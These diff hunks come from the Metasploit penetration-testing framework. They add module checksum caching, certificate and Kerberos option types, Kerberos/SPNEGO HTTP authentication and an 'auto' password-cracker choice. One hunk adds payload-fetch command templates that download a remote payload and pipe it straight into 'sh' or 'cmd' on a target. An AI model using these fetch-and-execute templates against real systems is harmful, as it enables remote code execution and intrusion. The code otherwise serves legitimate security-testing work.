@@ -14,6 +16,7 @@ module Msf::Modules::Metadata::Store

  BaseMetaDataFile = 'modules_metadata_base.json'
  UserMetaDataFile = 'modules_metadata.json'
+  CacheMetaDataFile = 'module_metadata_cache.json'

  #
  # Initializes from user store (under ~/store/.msf4) if it exists. else base file (under $INSTALL_ROOT/db) is copied and loaded.
@@ -124,4 +127,164 @@ module Msf::Modules::Metadata::Store
    }
  end

+  # This method checks if the current module and library files match the cached checksum.
+  # It uses a per-file CRC32 cache to avoid recalculating checksums for files that haven't changed.
+  # If no cache exists, it will create one in the user's directory.
+  #
+  # @return [Boolean] True if the current checksum matches the cached one
+  def self.valid_checksum?
+    current_checksum = get_current_checksum
+    cached_sha = get_cached_checksum
+
+    # If no cached checksum exists, create the cache file with current checksum
+    if cached_sha.nil?
+      update_cache_checksum(current_checksum)
+      return false
+    end
+
+    checksums_match?(current_checksum, cached_sha)
+  end
+
+  # Calculate the current checksum for all module and library files
+  # This calculates checksums for each file and generates an overall checksum
+  # from the individual file checksums. Does NOT update the cached checksum.
+  #
+  # @return [Integer] The current overall checksum
+  def self.get_current_checksum
+    files = collect_files_to_check
+    cache_file = get_cache_path
+    cache_data = load_combined_cache(cache_file)
+
+    files_lookup = {}
+    cache_data['files'].each { |entry| files_lookup[entry['path']] = entry }
+
+    file_crc32s_with_metadata = calculate_file_checksums(files, files_lookup)
+
+    file_crc32s = file_crc32s_with_metadata.map { |_, meta| meta['crc32'] }.sort
+
+    overall_checksum = calculate_overall_checksum(file_crc32s)
+
+    overall_checksum
+  end
+
+  # Compare the current checksum with the cached checksum
+  # @param [String] current_checksum The calculated checksum for the current state
+  # @param [String] cached_checksum The checksum retrieved from cache
+  # @return [Boolean] True if checksums match, false otherwise
+  def self.checksums_match?(current_checksum, cached_checksum)
+    current_checksum == cached_checksum
+  end
+
+  # Calculate the overall checksum from individual file checksums
+  # @param [Array<Integer>] file_crc32s Array of individual file CRC32 values
+  # @return [Integer] The overall CRC32 as an integer
+  def self.calculate_overall_checksum(file_crc32s)
+    Zlib.crc32(file_crc32s.join(','), 0)
+  end
+
+  # Collect all files that need to be checked for checksums
+  # @return [Array<String>] List of file paths
+  def self.collect_files_to_check
+    # Define the directories to scan for files
+    modules_dir = File.join(Msf::Config.install_root, 'modules', '**', '*')
+    local_modules_dir = File.join(Msf::Config.user_module_directory, '**', '*')
+    lib_dir = File.join(Msf::Config.install_root, 'lib', '**', '*')
+    # Gather all files from the specified directories
+    Dir.glob([modules_dir, lib_dir, local_modules_dir]).select { |f| File.file?(f) }.sort
+  end
+
+  # Calculate checksums for all files, using the cache when possible
+  # @param [Array<String>] files List of file paths to check
+  # @param [Hash] cache Current cache data
+  # @return [Array<Array>] Array of [file_path, metadata] pairs
+  def self.calculate_file_checksums(files, cache)
+    Parallel.map(files, in_threads: Etc.nprocessors * 2) do |file|
+      # Get file metadata (size and last modified time)
+      file_metadata = File.stat(file)
+      cache_entry = cache[file]
+      # Use cached CRC32 if mtime and size match, otherwise recalculate
+      if cache_entry && cache_entry['mtime'] == file_metadata.mtime.to_i && cache_entry['size'] == file_metadata.size
+        crc32 = cache_entry['crc32']
+      else
+        crc32 = File.open(file, 'rb') { |fd| Zlib.crc32(fd.read, 0) }
+      end
+      # Return file and its metadata for later aggregation
+      [file, {
+        'crc32' => crc32,
+        'mtime' => file_metadata.mtime.to_i,
+        'size' => file_metadata.size
+      }]
+    end
+  end
+
+  # Get the path to the cache file
+  # @return [String] Path to the cache file
+  def self.get_cache_path
+    File.join(Msf::Config.config_directory, "store", CacheMetaDataFile)
+  end
+
+  # Load the combined cache from disk (contains both files and checksum)
+  # @param [String] cache_file Path to the cache file
+  # @return [Hash] The loaded cache with 'files' and 'checksum' keys, or empty structure if file doesn't exist
+  def self.load_combined_cache(cache_file)
+    if File.exist?(cache_file)
+      cache_content = JSON.parse(File.read(cache_file))
+      # Ensure the cache has the expected structure
+      {
+        'files' => cache_content['files'] || [],
+        'checksum' => cache_content['checksum']
+      }
+    else
+      { 'files' => [], 'checksum' => nil }
+    end
+  end
+
+  # Save the combined cache to disk (files and checksum in one file)
+  # @param [String] cache_file Path to the cache file
+  # @param [Hash] files_cache The per-file cache data
+  # @param [Integer] overall_checksum The overall checksum
+  # @return [void]
+  def self.save_combined_cache(cache_file, files_cache, overall_checksum)
+    # Ensure the directory for the cache file exists before writing
+    FileUtils.mkdir_p(File.dirname(cache_file))
+
+    cache_content = {
+      'checksum' => overall_checksum,
+      'files' => files_cache
+    }
+
+    File.write(cache_file, JSON.pretty_generate(cache_content))
+  end
+
+  # Get the cached checksum value from the combined cache file
+  # @return [Integer, nil] The cached checksum value or nil if no cache exists
+  def self.get_cached_checksum
+    cache_path = get_cache_path
+    cache_data = load_combined_cache(cache_path)
+    cache_data['checksum']
+  end
+
+  # Update the cache with the current checksum and file data
+  # @param [Integer] current_checksum The current checksum to store in the cache
+  # @return [void]
+  def self.update_cache_checksum(current_checksum)
+    # Recalculate file checksums and update both overall checksum and file cache
+    files = collect_files_to_check
+    cache_file = get_cache_path
+    cache_data = load_combined_cache(cache_file)
+
+    files_lookup = {}
+    cache_data['files'].each { |entry| files_lookup[entry['path']] = entry }
+
+    file_crc32s_with_metadata = calculate_file_checksums(files, files_lookup)
+
+    updated_files_cache = file_crc32s_with_metadata.map do |file_path, metadata|
+      metadata.merge('path' => file_path)
+    end
+
+    updated_files_cache.sort_by! { |entry| entry['path'] }
+
+    # Save both the updated file cache and the new overall checksum
+    save_combined_cache(cache_file, updated_files_cache, current_checksum)
+  end
 end
@@ -0,0 +1,37 @@
+# -*- coding: binary -*-
+
+module Msf
+  ###
+  #
+  # Opt that can be reference a database Id or a file on disk; Valid examples:
+  # - /tmp/foo.txt
+  # - id:123
+  ###
+  class OptDatabaseRefOrPath < OptBase
+    def normalize(value)
+      return value if value.nil? || value.to_s.empty? || value.start_with?('id:')
+
+      File.expand_path(value)
+    end
+
+    def validate_on_assignment?
+      false
+    end
+
+    # Generally, 'value' should be a file that exists, or an integer database id.
+    def valid?(value, check_empty: true, datastore: nil)
+      return false if check_empty && empty_required_value?(value)
+
+      if value && !value.empty?
+        if value.start_with?('id:')
+          return value.match?(/^id:\d+$/)
+        end
+
+        unless File.exist?(File.expand_path(value))
+          return false
+        end
+      end
+      super
+    end
+  end
+end
@@ -0,0 +1,14 @@
+# -*- coding: binary -*-
+
+module Msf
+  ###
+  #
+  # Pkcs12 cert that can either exist on disk, or as a database core ID
+  #
+  ###
+  class OptKerberosCredentialCache < OptDatabaseRefOrPath
+    def type
+      'kerberos_credential_cache'
+    end
+  end
+end
@@ -0,0 +1,14 @@
+# -*- coding: binary -*-
+
+module Msf
+  ###
+  #
+  # Pkcs12 cert that can either exist on disk, or as a database core ID
+  #
+  ###
+  class OptPkcs12Cert < OptDatabaseRefOrPath
+    def type
+      'pkcs12_cert'
+    end
+  end
+end
@@ -86,7 +86,7 @@ module Msf::Payload::Adapter::Fetch
  def pipe_supported_binaries
    # this is going to expand when we add psh support
    return %w[CURL] if windows?
-    %w[WGET CURL]
+    %w[WGET GET CURL]
  end

  def generate(opts = {})
@@ -115,6 +115,8 @@ module Msf::Payload::Adapter::Fetch
    case datastore['FETCH_COMMAND'].upcase
    when 'WGET'
      return _generate_wget_pipe
+    when 'GET'
+      return _generate_get_pipe
    when 'CURL'
      return _generate_curl_pipe
    else
@@ -132,6 +134,8 @@ module Msf::Payload::Adapter::Fetch
      return _generate_tnftp_command
    when 'WGET'
      return _generate_wget_command
+    when 'GET'
+      return _generate_get_command
    when 'CURL'
      return _generate_curl_command
    when 'TFTP'
@@ -336,6 +340,43 @@ module Msf::Payload::Adapter::Fetch
    end
  end

+  def _generate_get_command
+    # Specifying the method (-m GET) is necessary on OSX
+    case fetch_protocol
+    when 'HTTP'
+      get_file_cmd = "GET -m GET http://#{download_uri}>#{_remote_destination}"
+    when 'HTTPS'
+      # There is no way to disable cert check in GET ...
+      print_error('GET binary does not support insecure mode')
+      fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
+      get_file_cmd = "GET -m GET https://#{download_uri}>#{_remote_destination}"
+    when 'FTP'
+      get_file_cmd = "GET ftp://#{download_uri}>#{_remote_destination}"
+    else
+      fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
+    end
+    _execute_add(get_file_cmd)
+  end
+
+  def _generate_get_pipe
+    # Specifying the method (-m GET) is necessary on OSX
+    execute_cmd = 'sh'
+    execute_cmd = 'cmd' if windows?
+    case fetch_protocol
+    when 'HTTP'
+      return "GET -m GET http://#{_download_pipe}|#{execute_cmd}"
+    when 'HTTPS'
+      # There is no way to disable cert check in GET ...
+      print_error('GET binary does not support insecure mode')
+      fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
+      return "GET -m GET https://#{_download_pipe}|#{execute_cmd}"
+    when 'FTP'
+      return "GET ftp://#{_download_pipe}|#{execute_cmd}"
+    else
+      fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
+    end
+  end
+
  def _generate_ftp_command
    case fetch_protocol
    when 'FTP'
@@ -3,10 +3,10 @@ module Msf::Payload::Adapter::Fetch::LinuxOptions
    super
    register_options(
      [
-        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP GET TFTP TNFTP WGET]]),
        Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),
        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'none']),
-        Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL WGET]]),
+        Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL GET WGET]]),
        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'none'])
      ]
    )
@@ -13,7 +13,7 @@ module Payload::Android::MeterpreterLoader

  include Msf::Payload::Android
  include Msf::Payload::UUID::Options
-  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MeterpreterOptions::Android

  def initialize(info={})
    super(update_info(info,
@@ -13,7 +13,7 @@ module Payload::Java::MeterpreterLoader

  include Msf::Payload::Java
  include Msf::Payload::UUID::Options
-  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MeterpreterOptions::Java

  def initialize(info = {})
    super(update_info(info,
@@ -14,7 +14,7 @@ module Payload::Python::MeterpreterLoader
  include Msf::Payload::Python
  include Msf::Payload::UUID::Options
  include Msf::Payload::TransportConfig
-  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MeterpreterOptions::Python

  def initialize(info = {})
    super(update_info(info,
@@ -73,8 +73,9 @@ module Msf

          # only upload the file if a compiler exists
          write_file path.to_s, strip_comments(data)
-
-          compiler_cmd = "#{compiler} -o '#{path.sub(/\.c$/, '')}' '#{path}'"
+          
+          executable_path = path.sub(/\.c$/, '')
+          compiler_cmd = "#{compiler} -o '#{executable_path}' '#{path}'"
          if session.type == 'shell'
            compiler_cmd = "PATH=\"$PATH:/usr/bin/\" #{compiler_cmd}"
          end
@@ -95,7 +96,7 @@ module Msf
            fail_with Module::Failure::BadConfig, message
          end

-          chmod path
+          chmod executable_path
        end

        #
@@ -0,0 +1,22 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Post
+    module Linux
+      module User
+        include ::Msf::Post::Common
+        #
+        # Returns a string of the user's home directory
+        #
+        def get_home_dir(user)
+          cmd_exec("grep '^#{user}:' /etc/passwd | cut -d ':' -f 6").chomp
+          # could also be: "getent passwd #{user} | cut -d: -f6"
+        end
+        # User
+      end
+      # Linux
+    end
+    # Post
+  end
+  # Msf
+end
@@ -344,7 +344,7 @@ class Creds
    set_rhosts = false
    truncate = true

-    cred_table_columns = [ 'host', 'origin' , 'service', 'public', 'private', 'realm', 'private_type', 'JtR Format', 'cracked_password' ]
+    cred_table_columns = [ 'id', 'host', 'origin' , 'service', 'public', 'private', 'realm', 'private_type', 'JtR Format', 'cracked_password' ]
    delete_count = 0
    search_term = nil

@@ -506,7 +506,8 @@ class Creds
          service_info = build_service_info(service)
        end
        cracked_password_val = cracked_password_core&.private&.data.to_s
-        tbl << [
+        row = [
+          core.id,
          host,
          origin,
          service_info,
@@ -517,6 +518,7 @@ class Creds
          jtr_val,
          cracked_password_val
        ]
+        tbl << row
      end
    end

@@ -909,7 +909,7 @@ module Msf
            end

            if framework.features.enabled?(Msf::FeatureManager::DISPLAY_MODULE_ACTION) && mod.respond_to?(:actions) && mod.actions.size > 1
-              print_status "Using action %grn#{mod.action.name}%clr - view all #{mod.actions.size} actions with the %grnshow actions%clr command"
+              print_status "Setting default action %grn#{mod.action.name}%clr - view all #{mod.actions.size} actions with the %grnshow actions%clr command"
            end

            mod.init_ui(driver.input, driver.output)
@@ -72,6 +72,16 @@ class Driver < Msf::Ui::Driver
      elog(e)
    end

+    # Check if files have been modified and force immediate loading if so
+    has_modified_metasploit_files = !Msf::Modules::Metadata::Store.valid_checksum?
+
+    if has_modified_metasploit_files
+      current_checksum = Msf::Modules::Metadata::Store.get_current_checksum
+      Msf::Modules::Metadata::Store.update_cache_checksum(current_checksum)
+      # Force immediate module loading when files have changed
+      opts['DeferModuleLoads'] = false
+    end
+
    if opts['DeferModuleLoads'].nil?
      opts['DeferModuleLoads'] = Msf::FeatureManager.instance.enabled?(Msf::FeatureManager::DEFER_MODULE_LOADS)
    end
@@ -163,7 +173,8 @@ class Driver < Msf::Ui::Driver
      self.framework.init_module_paths(module_paths: opts['ModulePath'], defer_module_loads: opts['DeferModuleLoads'])
    end

-    unless opts['DeferModuleLoads']
+    # Refresh module cache if modules are modified, or we're not deferring loads
+    if has_modified_metasploit_files || !opts['DeferModuleLoads']
      framework.threads.spawn("ModuleCacheRebuild", true) do
        framework.modules.refresh_cache_from_module_files
      end
@@ -248,7 +248,7 @@ require 'digest/sha1'
      end

      # use
-      self.to_win32pe_exe_sub(framework, code, opts)
+      return self.to_win32pe_exe_sub(framework, code, opts)
    end

    # Allow the user to specify their own EXE template
@@ -630,7 +630,6 @@ require 'digest/sha1'
    opts[:exe_type] = :exe_sub
    exe_sub_method(code,opts)
  end
-
  # self.to_win64pe
  #
  # @param framework  [Msf::Framework]  The framework of you want to use
@@ -674,24 +673,10 @@ require 'digest/sha1'
  #
  # @return [String] Windows Service PE file
  def self.to_win32pe_service(framework, code, opts = {})
+    # Allow the user to specify their own service EXE template
    set_template_default(opts, "template_x86_windows_svc.exe")
-    if opts[:sub_method]
-      # Allow the user to specify their own service EXE template
-      opts[:exe_type] = :service_exe
-      return exe_sub_method(code,opts)
-    else
-      ENV['MSF_SERVICENAME'] = opts[:servicename]
-
-      opts[:framework] = framework
-      opts[:payload] = 'stdin'
-      opts[:encoder] = '@x86/service,'+(opts[:serviceencoder] || '')
-
-      # XXX This should not be required, it appears there is a dependency inversion
-      # See https://github.com/rapid7/metasploit-framework/pull/9851
-      venom_generator = Msf::PayloadGenerator.new(opts)
-      code_service = venom_generator.multiple_encode_payload(code)
-      return to_winpe_only(framework, code_service, opts)
-    end
+    opts[:exe_type] = :service_exe
+    exe_sub_method(code,opts)
  end

  # self.to_win64pe_service
@@ -46,7 +46,7 @@ module MsfdbHelpers
      begin
        file_name = File.join(path, 'msfdb_testfile')
        File.open(file_name, 'w') do |f|
-          f.puts "#!/bin/bash\necho exec"
+          f.puts "#!/bin/sh\necho exec"
        end
        File.chmod(0744, file_name)

@@ -85,11 +85,11 @@ class Pivot
    c = Class.new(::Msf::Payload)
    c.include(::Msf::Payload::Stager)
    c.include(::Msf::Payload::TransportConfig)
-    c.include(::Msf::Sessions::MeterpreterOptions)

    # TODO: add more platforms
    case opts[:platform]
    when 'windows'
+      c.include(::Msf::Sessions::MeterpreterOptions::Windows) # Moved to be platform-specific
      # Include the appropriate reflective dll injection module for the target process architecture...
      if opts[:arch] == ARCH_X86
        c.include(::Msf::Payload::Windows::MeterpreterLoader)
@@ -314,6 +314,13 @@ module Rex
              res = temp_response
            end
            return res
+          elsif supported_auths.include?('Kerberos') && (preferred_auth.nil? || preferred_auth == 'Kerberos') && kerberos_authenticator
+            opts['provider'] = 'Kerberos'
+            temp_response = kerberos_auth(opts, mechanism: Rex::Proto::Gss::Mechanism::KERBEROS)
+            if temp_response.is_a? Rex::Proto::Http::Response
+              res = temp_response
+            end
+            return res
          elsif supported_auths.include?('Negotiate') && (preferred_auth.nil? || preferred_auth == 'Negotiate')
            opts['provider'] = 'Negotiate'
            temp_response = negotiate_auth(opts)
@@ -321,9 +328,9 @@ module Rex
              res = temp_response
            end
            return res
-          elsif supported_auths.include?('Negotiate') && (preferred_auth.nil? || preferred_auth == 'Kerberos')
+          elsif supported_auths.include?('Negotiate') && (preferred_auth.nil? || preferred_auth == 'Kerberos') && kerberos_authenticator
            opts['provider'] = 'Negotiate'
-            temp_response = kerberos_auth(opts)
+            temp_response = kerberos_auth(opts, mechanism: Rex::Proto::Gss::Mechanism::SPNEGO)
            if temp_response.is_a? Rex::Proto::Http::Response
              res = temp_response
            end
@@ -411,16 +418,21 @@ module Rex
          end
        end

-        def kerberos_auth(opts = {})
+        def kerberos_auth(opts = {}, mechanism: Rex::Proto::Gss::Mechanism::KERBEROS)
          to = opts['timeout'] || 20
-          auth_result = kerberos_authenticator.authenticate(mechanism: Rex::Proto::Gss::Mechanism::KERBEROS)
+          auth_result = kerberos_authenticator.authenticate(mechanism: mechanism)
          gss_data = auth_result[:security_blob]
          gss_data_b64 = Rex::Text.encode_base64(gss_data)

          # Separate options for the auth requests
          auth_opts = opts.clone
          auth_opts['headers'] = opts['headers'].clone
-          auth_opts['headers']['Authorization'] = "Kerberos #{gss_data_b64}"
+          case mechanism
+          when Rex::Proto::Gss::Mechanism::KERBEROS
+            auth_opts['headers']['Authorization'] = "Kerberos #{gss_data_b64}"
+          when Rex::Proto::Gss::Mechanism::SPNEGO
+            auth_opts['headers']['Authorization'] = "Negotiate #{gss_data_b64}"
+          end

          if auth_opts['no_body_for_auth']
            auth_opts.delete('data')
@@ -76,7 +76,7 @@ Gem::Specification.new do |spec|
  # Needed for Meterpreter
  spec.add_runtime_dependency 'metasploit-payloads', '2.0.221'
  # Needed for the next-generation POSIX Meterpreter
-  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.42'
+  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.45'
  # Needed by msfgui and other rpc components
  # Locked until build env can handle newer version. See: https://github.com/msgpack/msgpack-ruby/issues/334
  spec.add_runtime_dependency 'msgpack', '~> 1.6.0'
@@ -262,6 +262,9 @@ Gem::Specification.new do |spec|
  # When Ruby ships with `gem --version` 3.6.0 or higher by default this can be removed
  spec.add_runtime_dependency 'stringio', '3.1.1'

+  # Needed for caching validation
+  spec.add_runtime_dependency 'parallel'
+
  # Standard libraries: https://www.ruby-lang.org/en/news/2023/12/25/ruby-3-3-0-released/
  %w[
    abbrev
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
        OptString.new('DOMAIN', [ false, 'The Fully Qualified Domain Name (FQDN). Ex: mydomain.local' ]),
        OptString.new('USERNAME', [ false, 'The domain user' ]),
        OptString.new('PASSWORD', [ false, 'The domain user\'s password' ]),
-        OptPath.new('CERT_FILE', [ false, 'The PKCS12 (.pfx) certificate file to authenticate with' ]),
+        OptPkcs12Cert.new('CERT_FILE', [ false, 'The PKCS12 (.pfx) certificate file to authenticate with' ]),
        OptString.new('CERT_PASSWORD', [ false, 'The certificate file\'s password' ]),
        OptString.new(
          'NTHASH', [
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
          ],
          conditions: %w[ACTION == GET_TGS]
        ),
-        OptPath.new(
+        OptKerberosCredentialCache.new(
          'Krb5Ccname', [
            false,
            'The Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked'
@@ -91,12 +91,8 @@ class MetasploitModule < Msf::Auxiliary

  def validate_options
    if datastore['CERT_FILE'].present?
-      certificate = File.binread(datastore['CERT_FILE'])
-      begin
-        @pfx = OpenSSL::PKCS12.new(certificate, datastore['CERT_PASSWORD'] || '')
-      rescue OpenSSL::PKCS12::PKCS12Error => e
-        fail_with(Failure::BadConfig, "Unable to parse certificate file (#{e})")
-      end
+      pkcs12_storage = Msf::Exploit::Remote::Pkcs12::Storage.new(framework: framework, framework_module: self)
+      @pfx = pkcs12_storage.read_pkcs12_cert_path(datastore['CERT_FILE'], datastore['CERT_PASSWORD'], workspace: workspace)[:value]

      if datastore['USERNAME'].blank? && datastore['DOMAIN'].present?
        fail_with(Failure::BadConfig, 'Domain override provided but no username override provided (must provide both or neither)')
@@ -25,8 +25,9 @@ class MetasploitModule < Msf::Auxiliary
      'Actions' => [
        ['john', { 'Description' => 'Use John the Ripper' }],
        ['hashcat', { 'Description' => 'Use Hashcat' }],
+        ['auto', { 'Description' => 'Auto-selection of cracker' }]
      ],
-      'DefaultAction' => 'john',
+      'DefaultAction' => 'auto',
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [],
@@ -45,9 +46,9 @@ class MetasploitModule < Msf::Auxiliary
  def show_command(cracker_instance)
    return unless datastore['ShowCommand']

-    if action.name == 'john'
+    if @cracker_type == 'john'
      cmd = cracker_instance.john_crack_command
-    elsif action.name == 'hashcat'
+    elsif @cracker_type == 'hashcat'
      cmd = cracker_instance.hashcat_crack_command
    end
    print_status("   Cracking Command: #{cmd.join(' ')}")
@@ -63,12 +64,12 @@ class MetasploitModule < Msf::Auxiliary
      next unless fields.count >= 3

      cred = { 'hash_type' => hash_type, 'method' => method }
-      if action.name == 'john'
+      if @cracker_type == 'john'
        cred['username'] = fields.shift
        cred['core_id'] = fields.pop
        4.times { fields.pop } # Get rid of extra :
        cred['password'] = fields.join(':') # Anything left must be the password. This accounts for passwords with semi-colons in it
-      elsif action.name == 'hashcat'
+      elsif @cracker_type == 'hashcat'
        cred['core_id'] = fields.shift
        cred['hash'] = fields.shift
        cred['password'] = fields.join(':') # Anything left must be the password. This accounts for passwords with semi-colons in it
@@ -85,14 +86,20 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run
-    tbl = tbl = cracker_results_table
+    tbl = cracker_results_table
+    cracker = new_password_cracker(action.name)
+    if action.name == 'auto'
+      @cracker_type = cracker.get_type
+    else
+      @cracker_type = action.name
+    end

    hash_types_to_crack = ['descrypt']
    jobs_to_do = []

    # build our job list
    hash_types_to_crack.each do |hash_type|
-      job = hash_job(hash_type, action.name)
+      job = hash_job(hash_type, @cracker_type)
      if job.nil?
        print_status("No #{hash_type} found to crack")
      else
@@ -110,8 +117,6 @@ class MetasploitModule < Msf::Auxiliary
    # Inner array format: db_id, hash_type, username, password, method_of_crack
    results = []

-    cracker = new_password_cracker(action.name)
-
    # generate our wordlist and close the file handle.  max length of DES is 8
    wordlist = wordlist_file(8)
    unless wordlist
@@ -136,7 +141,7 @@ class MetasploitModule < Msf::Auxiliary
      cracker_instance = cracker.dup
      cracker_instance.format = format

-      if action.name == 'john'
+      if @cracker_type == 'john'
        cracker_instance.fork = datastore['FORK']
      end

@@ -147,7 +152,7 @@ class MetasploitModule < Msf::Auxiliary
      job['cred_ids_left_to_crack'] = job['cred_ids_left_to_crack'] - results.map { |i| i[0].to_i } # remove cracked hashes from the hash list
      next if job['cred_ids_left_to_crack'].empty?

-      if action.name == 'john'
+      if @cracker_type == 'john'
        print_status "Cracking #{format} hashes in single mode..."
        cracker_instance.mode_single(wordlist.path)
        show_command cracker_instance
@@ -189,7 +194,7 @@ class MetasploitModule < Msf::Auxiliary
      print_status "Cracking #{format} hashes in wordlist mode..."
      cracker_instance.mode_wordlist(wordlist.path)
      # Turn on KoreLogic rules if the user asked for it
-      if action.name == 'john' && datastore['KORELOGIC']
+      if @cracker_type == 'john' && datastore['KORELOGIC']
        cracker_instance.rules = 'KoreLogicRules'
        print_status 'Applying KoreLogic ruleset...'
      end
@@ -34,8 +34,9 @@ class MetasploitModule < Msf::Auxiliary
      'Actions' => [
        ['john', { 'Description' => 'Use John the Ripper' }],
        ['hashcat', { 'Description' => 'Use Hashcat' }],
+        ['auto', { 'Description' => 'Auto-selection of cracker' }]
      ],
-      'DefaultAction' => 'john',
+      'DefaultAction' => 'auto',
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [],
@@ -58,9 +59,9 @@ class MetasploitModule < Msf::Auxiliary
  def show_command(cracker_instance)
    return unless datastore['ShowCommand']

-    if action.name == 'john'
+    if @cracker_type == 'john'
      cmd = cracker_instance.john_crack_command
-    elsif action.name == 'hashcat'
+    elsif @cracker_type == 'hashcat'
      cmd = cracker_instance.hashcat_crack_command
    end
    print_status("   Cracking Command: #{cmd.join(' ')}")
@@ -74,13 +75,13 @@ class MetasploitModule < Msf::Auxiliary
      fields = password_line.split(':')
      cred = { 'hash_type' => hash_type, 'method' => method }

-      if action.name == 'john'
+      if @cracker_type == 'john'
        next unless fields.count >= 3

        cred['username'] = fields.shift
        cred['core_id'] = fields.pop
        cred['password'] = fields.join(':') # Anything left must be the password. This accounts for passwords with semi-colons in it
-      elsif action.name == 'hashcat'
+      elsif @cracker_type == 'hashcat'
        next unless fields.count >= 2

        cred['core_id'] = fields.shift
@@ -109,7 +110,13 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run
-    tbl = tbl = cracker_results_table
+    tbl = cracker_results_table
+    cracker = new_password_cracker(action.name)
+    if action.name == 'auto'
+      @cracker_type = cracker.get_type
+    else
+      @cracker_type = action.name
+    end

    # array of hashes in jtr_format in the db, converted to an OR combined regex
    hash_types_to_crack = []
@@ -128,7 +135,7 @@ class MetasploitModule < Msf::Auxiliary

      # hashcat requires a format we dont have all the data for
      # in the current dumper, so this is disabled in module and lib
-      if action.name == 'john'
+      if @cracker_type == 'john'
        hash_types_to_crack << 'oracle'
        hash_types_to_crack << 'dynamic_1506'
      end
@@ -143,7 +150,7 @@ class MetasploitModule < Msf::Auxiliary

    # build our job list
    hash_types_to_crack.each do |hash_type|
-      job = hash_job(hash_type, action.name)
+      job = hash_job(hash_type, cracker.cracker)
      if job.nil?
        print_status("No #{hash_type} found to crack")
      else
@@ -161,8 +168,6 @@ class MetasploitModule < Msf::Auxiliary
    # Inner array format: db_id, hash_type, username, password, method_of_crack
    results = []

-    cracker = new_password_cracker(action.name)
-
    # generate our wordlist and close the file handle.
    wordlist = wordlist_file
    unless wordlist
@@ -187,7 +192,7 @@ class MetasploitModule < Msf::Auxiliary
      cracker_instance = cracker.dup
      cracker_instance.format = format

-      if action.name == 'john'
+      if @cracker_type == 'john'
        cracker_instance.fork = datastore['FORK']
      end

@@ -198,7 +203,7 @@ class MetasploitModule < Msf::Auxiliary
      job['cred_ids_left_to_crack'] = job['cred_ids_left_to_crack'] - results.map { |i| i[0].to_i } # remove cracked hashes from the hash list
      next if job['cred_ids_left_to_crack'].empty?

-      if action.name == 'john'
+      if @cracker_type == 'john'
        print_status "Cracking #{format} hashes in single mode..."
        cracker_instance.mode_single(wordlist.path)
        show_command cracker_instance
@@ -239,7 +244,7 @@ class MetasploitModule < Msf::Auxiliary
        print_status "Cracking #{format} hashes in wordlist mode..."
        cracker_instance.mode_wordlist(wordlist.path)
        # Turn on KoreLogic rules if the user asked for it
-        if action.name == 'john' && datastore['KORELOGIC']
+        if @cracker_type == 'john' && datastore['KORELOGIC']
          cracker_instance.rules = 'KoreLogicRules'
          print_status 'Applying KoreLogic ruleset...'
        end
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .2.5
 .3.8